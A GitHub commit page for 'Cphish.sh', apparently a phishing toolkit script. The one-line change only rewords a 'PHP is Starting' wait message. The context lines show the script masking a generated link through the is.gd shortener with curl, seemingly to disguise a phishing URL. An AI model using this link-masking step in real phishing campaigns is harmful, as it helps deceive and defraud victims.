Skip to content

Commit

Permalink
Update Cphish.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
SajidIbnNayeem authored Nov 5, 2024
1 parent c9e61da commit 0001192
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion Cphish.sh
Original file line number Diff line number Diff line change
Expand Up @@ -109,7 +109,7 @@ replacer() {
sleep 1
echo -e "${yellow}${blue} Link : ${1}\n"
sleep 1
echo -e "${yellow}✋ Please Wait a minute PHP is Starting..... "
echo -e "${yellow}✋ Please Wait a few minute PHP is Starting..... "
netcheck
masked=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${1})
if ! [[ -z $masked ]]; then
Expand Down

0 comments on commit 0001192

Please sign in to comment.